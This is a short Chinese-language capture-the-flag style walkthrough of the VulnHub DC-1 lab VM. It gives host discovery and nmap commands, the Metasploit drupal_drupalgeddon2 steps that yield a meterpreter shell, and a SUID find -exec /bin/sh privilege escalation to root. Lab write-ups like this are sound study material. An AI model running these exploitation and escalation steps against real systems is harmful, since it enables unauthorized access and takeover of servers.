vulnhub之dc1的实践

admin 2020年10月8日18:24:39评论251 views字数 855阅读2分51秒阅读模式

这个十一假期比较懒,假期最后一天的下午才赶了一篇blog,实践的是vulnhub的dc1镜像,

下载地址,https://download.vulnhub.com/dc/DC-1.zip,

workstation导入启动就能获取到地址,省的换virtualbox了,

当然workstation导入启动就能获取到地址这个事儿是通过地址扫描确认的,sudo netdiscover -r 192.168.137.0/24,拿到了靶机地址192.168.137.11,

vulnhub之dc1的实践

接着做端口扫描,sudo nmap -sS -sV -T4 -A -p- 192.168.137.11,

vulnhub之dc1的实践

发现存在Drupal应用,就直接上metasploit里搜利用吧,

msfconsole,search drupal,

vulnhub之dc1的实践

这里选择了exploit/unix/webapp/drupal_drupalgeddon2进行攻击,为啥直接选这个,是参考了别人的writeup,说试了前两个没反应,我也就不浪费那个时间再验证一遍了,最近确实比较懒,哈哈,

use exploit/unix/webapp/drupal_drupalgeddon2,
show options,查看一下还需要设置哪些参数,
set RHOSTS 192.168.137.11,就设置个靶机地址即可,
exploit,

这就轻松的拿到meterpreter反弹shell了,

vulnhub之dc1的实践

getuid,发现不是root,接下来就想办法提权,
shell,python -c 'import pty; pty.spawn("/bin/bash")',

先转成可交互的shell,再查找一下有哪些有root权限的程序,

find / -perm -u=s -type f 2>/dev/null,

vulnhub之dc1的实践

find的这个程序非常好,随便找一个可读的文件吧,重新弹一个shell出来,

/usr/bin/find /var/www/COPYRIGHT.txt -exec /bin/sh ;

vulnhub之dc1的实践

至此拿root权限成功。

本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之dc1的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月8日18:24:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之dc1的实践https://cn-sec.com/archives/152233.html

发表评论

匿名网友 填写信息